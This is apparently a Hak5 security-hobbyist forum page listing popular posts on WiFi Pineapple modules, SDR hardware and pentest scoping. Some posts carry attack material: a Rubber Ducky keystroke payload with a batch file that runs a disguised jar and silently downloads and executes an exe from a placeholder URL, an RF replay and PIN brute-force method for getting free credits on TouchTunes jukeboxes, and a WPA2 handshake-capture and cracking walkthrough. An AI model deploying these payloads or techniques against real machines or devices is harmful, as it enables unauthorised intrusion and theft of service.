Leaderboard


Popular Content

Showing content with the highest reputation since 01/20/2017 in all areas

  1. 8 points
    I'm soo late to this game but I made a video to describe my feelings about it and help where I can to spread the word: https://www.youtube.com/watch?v=Wggu_qaYJaQ part of http://hackingtogether.org/ We on this list are for the most part already participating in a social group that has support. I'm not saying we don't have problems, but the ones that don't have such support, who aren't part of any groups or you only see at a con or two, but don't speak, don't participate in CTFs or other side events. Those are the ones (usually) in the most danger of feeling isolated. So, if you know people like that, reach out, invite them to be part of your team, group, or talk. Let us all help to make sure that another life isn't list for avoidable reasons. There are too few of us as it is.
  2. 4 points
    Then either tell your "friend" to press the button or stop doing illegal things.
  3. 3 points
    Thought some here might get a laugh out of it. If you've ever taken an Offsec course, you'll know this feeling. http://www.captiongenerator.com/320492/Offsec-Student-Admins
  4. 3 points
    When I do physical assessments that have WPA/2 enabled wireless networks I would like to have the ability to walk around the facility with a pineapple in my backpack and have it constantly trying to get a handshake in a reliable way. Here are a few requirement requests: Stability is key. I might only get one walk through to get it done. Needs to support more than one WPA ESSID (name). If I am targeting a building and they have a Employee and Guest networks I need to be able to get both in one go. See #1 Ability to automatically verify the handshake is valid via Aircrack or other tool Remove WPA ESSID automatically from the rotation if valid handshake is captured Shutdown the pineapple if all captured (save battery) optional setting Constantly be re-scanning the area for best AP to target. (If "BOBWIFI") is no longer in range it shouldn't attack it again Always target AP with best signal if possible Prioritize APs with clients if possible Have an auto-on with loaded AP names so I can just plug in the Pineapple when it's go time and not have to configure anything post-boot. Have the ability to auto-add APs in the area to a "temp" list while keeping a "target" list. List of APs with captured/verified handshakes for easy download of cap file Use both wifi cards if possible for 5ghz (TETRA) as well as 2ghz Try a few ways to get the handshake, I know there are a few techniques out there but I don't recall them all. Thoughts?
  5. 2 points
  6. 2 points
    Hi Roatandave, I just wanted to chime in on this module and give some guidance. First of all, I would suggest taking a look at the Let's Code we did about a year ago. It will provide you with enough information to properly format and develop your module. Taking a look at the Github link you provided, I noticed that the module.html is formatted incorrectly, and there is no module.info file. There are also duplicate and .pyc files in your Ajaxterm_files folder, which you may want to clean up. I would also like to talk about security a bit. While ajaxterm does seem to authenticate the user, there is no encryption or much regard given to security. This would somehow need to be resolved before we would be able to publish this module in our repository. I am sure this is possible, but it may actually be easier to re-write the terminal emulator from the ground up, and letting it interface directly with the WiFi Pineapple's module API.
  7. 2 points
    Sorry Foxtrot I forgot to say, I am not building a regular module. I am trying to get a terminal app to pass the command line to the dashboard without having to go through ssh. Just to go in and make quick changes.
  8. 2 points
    I apologize to all for my comments above.It was just a lack of sleep and frustration. I thank all of you for your interest and for correcting me. Yes, it starts its own port at localhost:8022 and broadcasts its own ajaxterm.html. The iframe in module.html is directed to this port and displays the terminal. In the Ajaxterm_files directory is ajaxterm.py which starts the terminal. The help that I need is putting a start/stop button in the module.html to enable and disable the terminal. Here is the link to my github. Edit: After days of searching and trying many terminal apps, I chose this one for it's size and it works in the Nano https://github.com/Roatandave/Nano-Terminal
  9. 2 points
  10. 2 points
    Open Command Prompt (Start Menu > type 'cmd' > Press enter) Type "assoc .bin= " (without the quotation marks, note the space after the equals sign) This will un(assoc)iate the .bin files from being opened with any program. You can then associate it with whatever you would like.
  11. 2 points
    Make sure the first line of your script reads: #!/bin/sh /etc/rc.common Copy your script to the /etc/init.d/ directory Make sure the execute bit is on chmod +x /etc/init.d/<your script> Enable your script /etc/init.d/<your script> enable Your script should now have a symlink in /etc/rc.d/ ls -lh /etc/rc.d | grep <your script> Confirm your init script is enabled: /etc/init.d/<your script> enabled && echo on If this command returns on, then you're all set. If this command doesn't return anything, then your script isn't enabled. Here you will find more information about booting http://wiki.openwrt.org/doc/techref/process.boot
  12. 2 points
    Great! Cabinet module worked like a charm! Thanks. Here is the API call parameters: module: Cabinet action: deleteFile file: /etc/pineapple/profiling_data Cheers.
  13. 2 points
    Hey Null Trace, you can have it running in the background if you install screen. You can install this by using: opkg install screen and then when you ssh in run screen first, by typing 'screen' and then run the commands and before disconnecting hitting CTRL-A and then D. To retrieve your screen session type 'screen -r' if you have more then one screen instance it will list them and you will need to type 'screen -r 4322' for example. If you want to close a screen instance retrieve it as above and type 'exit'. As for running DWall etc I'm note sure if it will work alongside sorry :) Hope this helps.
  14. 2 points
    The TP-Link wn722n is pretty good all-round https://www.amazon.co.uk/TP-LINK-TL-WN722N-Mbps-Wireless-Adapter/dp/B002SZEOLG I haven't heard of anyone having issues with it in Windows 10.
  15. 2 points
    I'd agree with getting it in writing to say what you are allowed to do and what is out of scope. I'd also make sure you stress that whatever you do, you are identifying issues, not proving issues don't exist. Another way to put it, if you find 2 issues from your testing you should write: I found two issues on our network, there might be more. Not: We have two issues on our network. It is a subtle difference but with the second, if they fix those two issues they will go away thinking they are done and secure, with the first, you are covering yourself from anything you missed. I'd also be careful with your terminology, a vulnerability assessment looks for issues, a penetration test then exploits them to see where you can get. Without skills, you are probably going to be able to identify vulnerabilities but unlikely to be able to properly exploit things without the potential for things going wrong (i.e. running Metasploit exploits against the domain controller is bad). Drop the word hacking completely. If you have any systems hosted on cloud platforms, make sure you have full permission of the hosting company, some care, some don't, some see it as you are paying so you control it, some will come after you. If you are going to scan your exterior across the internet then be careful where you scan from, some ISPs don't like to see scanning traffic leaving their networks. Again, talk to them and get something in writing.
  16. 2 points
    Update: I've successfully built hostapd version 2.6 with the MANA patches for OpenWRT. Senepost has not merged this version with the "release" version. But i feel like everything is stable enough to be pushed out. So i'm going to update my github repo. and packages asap. If you find any bugs, i'd be very happy if you could report them to me. PS. When running version 2.6, i'd be very very interested in peoples experiences with the "taxonomy" feature within hostapd. It's a feature that identifies the client device based on information stored within the probe and association packets being sent. I got this to work on my Linux version (PC), and i'd be very interested if we got this to work together with the MANA patches for OpenWRT. You would then be able to identify devices around you, based on their MAC address. For example: (Nexus 5, or iPhone 6s, etc.) PSS. Still working on a Pineapple Module. This turned out more time consuming than i had expected. But it's in progress.. :) Yours truly, Zylla / Andreas
  17. 2 points
    take the micro sd card out of the ducky and use the small keychain micro sd card reader and that will allow you to create and deploy your own payloads. you cannot access the inject.bin file on the sd card while it is plugged into the rubber ducky.
  18. 2 points
    I feel with the recent amount of forum posts about shop questions, we should probably have a sticky about the shop, and also an added message on forum signup. If you only signup to post about shop questions, a quick message in the signup process might help streamline pointing them to shop@hak5.org Also a small maybe 5 to 10 FAQ and answers in the sticky post about shop issues might also be a good resource for people who seem to always come to the forums for help with purchases, even though this is probably not where we'd want them gathering, it's inevitable they will always post here at some point. Being able to give a link to the sticky post about shop issues in the forum signup like our read first sticky posts would make a good addition.
  19. 2 points
    The only thing you need to do is this: root@Pineapple:~# wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v The install script detects the pineapple nano, and takes care of sym-linking the directory itself. It should be done before installing the packages. Also, if you were to copy the commands that you specified above (wget, Bash, Ln). It would fail. It should be run with lower letters, no big letters anywhere. There's also an error with the operators you supply to bash. So please, when installing. Copy the command i showed you above. It's the only thing you should need to do. Also, i need to stress this again: This is not for the faint of heart! Don't try installing this, and using this if you're not familiar with OpenWRT, SSH, and linux systems. You could potentially screw something up, if you don't know what you're doing. I'am working on a module that will make all this a lot easier, and user-friendly for everyone. And i'm hoping to have it ready soon.
  20. 1 point
    you most likely got rp-sma antennas as they are easy to find. The Tetra uses SMA antenna. The Tetra came with 5dbi antenna . Watch these and know that the Tetra with the 5dbi antenna already put out 29dbm and you really dont wanna go over that. 30dbm is max for US. At the most you might be able to get 6dbi SMA antenna.
  21. 1 point
    Thank you for looking, I found this program on the net and is only a starting point, an idea and yes it is a mess right now. I am not a programmer or a developer, just an old fart with some time to kill and enjoying the mental exercise.
  22. 1 point
    I use it for PineAP when I just want to plug in the nano to the battery and collect SSID and logs. It lets me know that wlan1 is in monitor mode and PineAP is running. Or turn it off if I have it out, that way it doesn't draw attention. Also I noticed that there is solder points for 3 more LED next to the green one. no LED just the solder points
  23. 1 point
    so. I have made some huge progress... 5.8ghz has been 100% stable (long range)for about 5days now... no packet loss, no more disconnects... 2.4 is to crowded... it was all pocket loss/retry/drop/retry I see 60mbps during good conditions but 40mbps is consistent... I ordered some sma pigtails, digital calipers and will build some antennas tuned for 5.8ghz...
  24. 1 point
    Everything on the store can be found here I can't see the mug though, it must be gone :(
  25. 1 point
    how did you setup WP6.sh? I used Manual over automatic because the automatic messed some things up. Normally your gateway is like 192.168.0.1, 10.0.0.1, 172.16.42.1 . unless you set that IP as your gateway through your router. if your unsure if its the pineapple, then plug it in and run an ifconfig when the blue light goes solid and go to the browser and just type in the 172.16.42.1:1471 and see where you get from there. You won't have ICS but you can see if its the pineapple or just your settings through wp6.sh
  26. 1 point
    btw i know you think the problem is 'bin opening in notepad' but the question is more what are you trying to do with a bin file in windows causing it to open in notepad, what are you expecting to accomplish? the last time i associated .bin in windows was so my cd burning app opened it to write it to a cd
  27. 1 point
    Se vocês usam a ortografia correta em vez das abreviaturas, outras pessoas podem traduzir e ler tambem. O Google não sabe o que fazer com aki vcs tb bj q eh né Mas bem vindo no site! _________________________________________________ If you guys would use correct spelling we can translate and read your posts. Google doesn't handle chat abbreviations very well. And welcome to the site!
  28. 1 point
    Thank you! You've made my head spin with all this information. I'm sure I'll come up with some questions soon.
  29. 1 point
    This is what I did on a fresh install of kali rolling and it worked fine for me. curl -s https://raw.githubusercontent.com/nu11secur1ty/pulseaudio/master/pulseaudio.sh | bash
  30. 1 point
    I appreciate the advice everyone. I've asked for a sit down with my Director to go over some of these and come up with a good plan. This is a great community, you guys are awesome!
  31. 1 point
  32. 1 point
    One thing I'd add to the list, document EVERYTHING. All commands from top to bottom that got you those results, and make sure it can be reproducible to the extent that anyone reading your report and documentation can make it happen without your help. This way once things get patched, they can test the results from your report.
  33. 1 point
    V0.4 has been released! https://github.com/notpike/The-Fonz TX all commands as you would with the remote! Passive PIN discovery! Brute Force a command, loops threw all 256 PINs for a single command! Dank ass meme's! Booze, Chicks/Dudes and more! No piratical application but here's a script that uses the YSO (or any other CC1111 radio that uses RfCat) to emulate, brute force, and listen for the TouchTunes Jukebox remote transmissions. With this power you could skip songs, turn up/down the volume, or possibly add promotion credits for free songs. For research purposes only of course :D. -=Here's the quick and dirty on how I reversed this remote=- So… This project all started 2 years ago when my wife and I dropped $20 at the local gay bar to listen to some filthy Dubstep, rad ass EDM, and Beck. After inserting that Jackson, I realized my grand idea of saving money isn’t working out… (We spent $120 that night… $40 on the jukebox…) Next morning, hung over and sad, I made it my mission to figure out how to get free music out of this Jukebox. This is how I started, and here’s how I bumbled my way to to figure out an IoT Jukebox known as TouchTunes. -=Reading=- I would just say research but TBH what I did wasn’t that sexy. Armed with my skill of “Google Fu” I found various manuals about the device. I found some good information in these manuals and it gave me a few ideas on how to score free jams. http://productwarranty.touchtunes.com/download/attachments/655383/900475-001-Virtuo Installation and Setup Guide-Rev08.pdf?api=v2 http://productwarranty.touchtunes.com/download/attachments/1572899/900203-002-Dashboard User Guide-Rev00.pdf?version=1 http://www.touchtunes.com/media/marketing_resources/Remote_Control_Users_Guide_1.pdf -=I called random strangers and sat at a bar=- I made a few phone calls to random TouchTunes Techs who specialize in repairing these devices and got a lot of good info for them. I learned it was Linux box, everything is encrypted, It costs money to own the key, everything is locked down, and you need to own ~10 of them to get true admin rights. I wanted a way to experiment with a VM of the OS to figure out how it ticked. Because I don’t have $5000 laying around I’m kinda forced to black box this device. Thanks to a few local bars who had their IoT Juke box on the public WiFi, I was able to take a quick gander. Sadly the techs where right… It’s locked down... I’ll revisit this approach latter when I can save up for my own personal Jukebox lol. You can also add credits via the Internet BTW. Try to see if there’s a way to make the Jukebox believe I’m god and make it sing and dance. -=Three things I learned=- 1.) You can fill the queue with music to play with out paying for it. This was a marketing plan to make people more committed to pay for music if they made a queue first. 2.) If configured, the jukebox can be set up to receive “promotional credit”. Bar tenders and or managers can add to the balance so more music could be played. This is added by pressing the ‘P1’ button the wireless remote… 3.) There is a wireless remote! It, transmits on 433.92 MHz and it can be found for $50 on ebay! -=My plan of attack=- Add music to the queue Add promotion points Get free music! -=I spent money=- Because I’m cheap, I picked up a after market remote that works with all TouchTunes Jukebox’s Gen 2 and above. The plan was to reverse this remote with my Yard Stick One and HackRF and try to figure out how it works. The remote only has 256 PIN provabilities to keep neighboring bars from walking on each other so I could just hand jam all 256 PIN’s (000-255) to figure out which one they are using. 9 times out of 10, it was 000. So yah, nothing complex here. -=Reversing… Kinda…=- The first thing I did was find the FCC data, not a lot of useful info here but I at least figured out it existed. https://fccid.io/2AHXI-T1 I used a HackRF with the 'osmocom_fft' to monitor and record the wireless remotes transmissions. I then took a look of the raw IQ data with 'inspectrum' to see what I was dealing with. Below is what the On/Off command looks like with a 000 PIN. With this I know I'm working with ASK/OOK. The message in raw binary is... 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, In Hex it would be... FFFF00A2888A2AAAA8888AA2AA2220 I found this by right clicking and added an 'Amplitude Plot in 'inspectrum', moved the bar over the transmission, added a 'Threshold Plot', clicked 'Enable cursors' to count out how many symbols are being used (also tells you the Symbol Rate) and then right clicked to 'Extract Symbols' and the values where outputted in the terminal. -=RfCat=- At this point I switched from using an SDR to RfCat and the YSO. After figuring out the preamble was 1111111111111111 or FFFF in hex, Modulation (ASK/OOK), and symbol rate (~1766) I was able to create a script based off Michael Ossmann's work to help me record the data. https://github.com/mossmann/stealthlock/blob/master/sl.py After a lot of beer and recording every PIN possibility for the On/Off a few patterns emerged. If you want to look threw all my data you can check out the paste bin below but here's what I believe how the transmission is formated. ==Preamble== ==key== ==Mesage== ==?== ffff00a2888a2 aaaa 8888aa2aa22 20 I still no idea what the last 2 hex values are about (I noticed that their where 2 possible messages for each command depending on what PIN was. The last 2 where either 02 or 88... I couldn't figure out the pattern so I just hard coded when which command was used vs the other depending on what PIN in my final script) -=After that=- I expand the original script I used to record all the transmissions of the remote and added a passive PIN discovery feature to it. I then recorded all the message's (All the buttons) the remote would send (Both potabilities) and added the ability to determine which command was used. A week later I figured out how to TX the decoded values and I made a working TouchTunes remote for the YSO. And it's been tested. :D http://pastebin.com/Ue7UYAPg http://www.pressonproducts.com/t1-jukebox-remote-touchtunes-compatible/
  34. 1 point
    I just wanna give you guys a headsup that you can edit the hostapd config-file to activate ACS (Automatic Channel Survey), which surveys for the best channel to use. Just set the channel to 0 to activate it. Also: You can use 5GHz channels if you are using the Pineapple Tetra. Or you could use both 2.4 and 5GHz at the same time (wlan0 + wlan1), to cover both spectrums. ;)
  35. 1 point
    Sort of, the file() function in PHP returns an array of lines from the file. $lines = file($ssidFile); This allows us to access each line of the file individually by using its index which would be n-1 where n is the line number you want. // Echo line 1 echo $lines[0]; // Echo line 2 echo $lines[1]; So to get the number of lines in the file we can use the count() function to count the number of elements in the array. echo count($lines); In this particular case the SSID file contains one SSID per line. So the number of lines in the file is equal to the number of SSIDs. I think Noth may have confused the principle of zero indexing an array with getting its number of elements which is why they subtracted one from the count.
  36. 1 point
    I recently got a Mark V which would no longer work if powered by the DC plug but would work fine if powered via USB. Long story short, somehow the previous owner blew out the Step-Down Converter and I managed to fix it, by replacing the chip. Anyone else managed to fry their pineapples? Full story here: https://madgyver.de/en/2017/01/23/wifi-pineapple-mark-v-repair/ This is the chip that was fried: http://aitendo3.sakura.ne.jp/aitendo_data/product_img/power/DC-DC/DC12-5V/FR9888.pdf
  37. 1 point
    you could dual boot kali using the rEFInd bootloader. That way your not using a VM with low ram.
  38. 1 point
    Sorry, forgot to insert a picture of the sucker. BTW, is there no edit button?
  39. 1 point
    UAC RUBBER DUCKY ENCODER AND GENERATOR NOW IN PYTHON 3 I would like to begin by giving a shout out to Skiddie the original creator of UAC-ducky generator implemented in python 2. I used his work in order to re-write the script so it now works for python 3. I have tested the script and it works for the option 1 and 2 perfectly. Option 3 and 4 works but I have no way of not testing whether it works on a rubber ducky because I no longer have access to a rubber ducky. For those who have the rubber ducky feel free to test option 3 and 4. You can find a video on how the offline mode works at Skiddie's youtube channel https://www.youtube.com/watch?v=X1uS0ELBJvI For the original UAC-Ducky generator produced by Skiddie checkout https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky/blob/master/uac-duck.py You can also find a write up on how it works as well as Demo videos. For the one written in python 3 you can find it here. https://github.com/EgbieAndersonUku1/rubber_ducky/blob/master/rubber_ducky_UAC_3.0.py
  40. 1 point
    well i think i may buy this one. i watched a video on tech tv on youtube and this was the one they were using. -- http://www.gearbest.com/tv-box-mini-pc/pp_188367.html -- so with these could i get an adapter so i could unhook my 4 bay tv antenna from the tv and hook it to this to receive radio signals?
  41. 1 point
    You can still do some fun stuff with that last RTL you posted. It has the same chipset as the RTL with the TCXO but the osculator isn't as nice. Personally I would get the one with the TCXO because their more forgiving to work with. You can tune it by adjusting for the frequency offset but I prefer one less thing to fight. Also if you decided to do more low power small bandwith monitoring (GPS for example) you would have a hard time with the cheaper RTL. If you're running windows I would recomend getting Virtuabox and download both Kali with the SDR meta package and GNU Radio Live. They both come with a lot of usefull tools. https://www.kali.org/news/kali-linux-metapackages/ http://gnuradio.org/redmine/projects/gnuradio/wiki/GNURadioLiveDVD Also I would recommend watching these to learn more about SDR. Alot of the examples you can do with the RTL. https://greatscottgadgets.com/sdr/
  42. 1 point
    I think a shop stickie would be a wonderful idea. Once my own side is up and running again having two might be a good idea. One for the main store, one for the EU one. Could solve a lot of issues overall with a quick FAQ in it. And while both the Hakshop and my own have FAQs, you'd be surprised how often having one in a forum clears things up also.
  43. 1 point
    google "writing shellcode" for videos and tuts.
  44. 1 point
    Nice article that explains the process and execution: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass
  45. 1 point
    you can make a wireless AP on your nexus 5 and use the 3rd radio to connect to it and then control the pineapple wireless.
  46. 1 point
    Another source: https://wiki.skullsecurity.org/index.php?title=Passwords and KoreLogic's site I think has some along with rules. They have run the Crack Me If You Can comps. This looks god too: http://www.netmux.com/blog/cracking-12-character-above-passwords
  47. 1 point
    Usually this issue happens when an SD card is corrupted in some way. Most operating systems tend to be a little more lenient when it comes to these errors, but the Pineapple gets confused sometimes. I have been able to fix this issue with the following steps: Completely wipe SD card with dd if=/dev/zero of=/dev/sdcard/sd bs=4096 Eject SD card from WiFi Pineapple NANO Power off WiFi Pineapple NANO Insert SD card into WiFi Pineapple NANO Power on WiFi Pineapple NANO Use the webinterface to format the SD card (this may take a while). Alternatively, use a linux distro to format the SD card ext4. The card should mount automatically. If it does not, reboot the WiFi Pineapple NANO.
  48. 1 point
    Hi Guys, Hola Chicos Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc.. Long time ago i was working hard to get the ideal cross-platform payload which works: 1. Cross-OSes 2. Cross-keyboard layouts (not all of them currently) As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool! Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers! The Windows part (Win 8.1 Eng & Win 7 Esp) So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go: DEFAULT_DELAY 75 DELAY 1000 WINDOWS r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING for %p in DELAY 10 SHIFT 8 STRING A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z DELAY 10 SHIFT 9 DELAY 100 STRING do %p DELAY 10 SHIFT . SHIFT 7 STRING r.bat ENTER DELAY 100 STRING for %p in DELAY 100 STRING (A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z) DELAY 100 STRING do %p:/r.bat ENTER You guys don't need me for sure to explain each step but i will only explain the highlights: 1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want) 2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout) You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content: @echo off color 10 REM Getting our drive letter which have the name SYMB assign to symb for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"')do set symb=%%d REM Copy a NOTmalicious file to the temp folder copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y REM Executing the NOTmalicious file start %tmp%\NOTmalicious.jar REM Downloading and executing another NOTmalicious file powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe" REM Goodbye exit It doesn't matter now what language the machine you're executing the bat file on. The macOS part (English KB Layout) The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world) So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste DEFAULT_DELAY 75 DELAY 1000 GUI SPACE DELAY 500 STRING terminal DELAY 100 ENTER DELAY 500 STRING chmod +X /Volumes/SYMB/symbiansymoh.sh ENTER DELAY 100 STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null & ENTER DELAY 100 GUI q DELAY 300 ENTER And again for feeding your curiosity here's the content of my symbiansymoh.sh file: #!/bin/bash rm -r /tmp/NOTmalicious.app; cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app; open /tmp/NOTmalicious.app; that copies a stored NOTmalicious.app file to the temp folder then executes it. Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI The topic is open to discussion, Any ideas, modification is always welcome! Cheers and have a great weekend guys!
  49. 1 point
    Hello Dez, I have some experience with this on Kali. For cracking WPA2 you will need to have some good CPU or GPU power... Let me explain a litle bit about hacking WPA2 as far as my experience reaches. First you need to set your WLAN card to promiscious mode ( airmon-ng command ) Then you will need to capture the handshake ( airodump-ng command) This could take some time, to capture it faster you could disassociate current clients so they reassociated and you capture their handshake ( aireplay-ng command) Once captured, you can crack it with a bruteforce or dictionary ( aircrack-ng command ). However, the pineapple has to less power to do this, I would recommend to create a custom dictionary on a kali machine and import the airodump file to the kali machine and run a dictionary attack. If that won't work you could try a brute force, however, as the minimum password length for WPA2 is 8 chars, it could take at least a couple of days. If you try to crack a 9 char password and they use special chars or numbers, forget it, this will take to long. My advice is to first install kali on a laptop, do the above commands, once you master it, use the nano to capture a handshake and crack it on the laptop, server. If you need any additional info, please let me know :)
  50. 1 point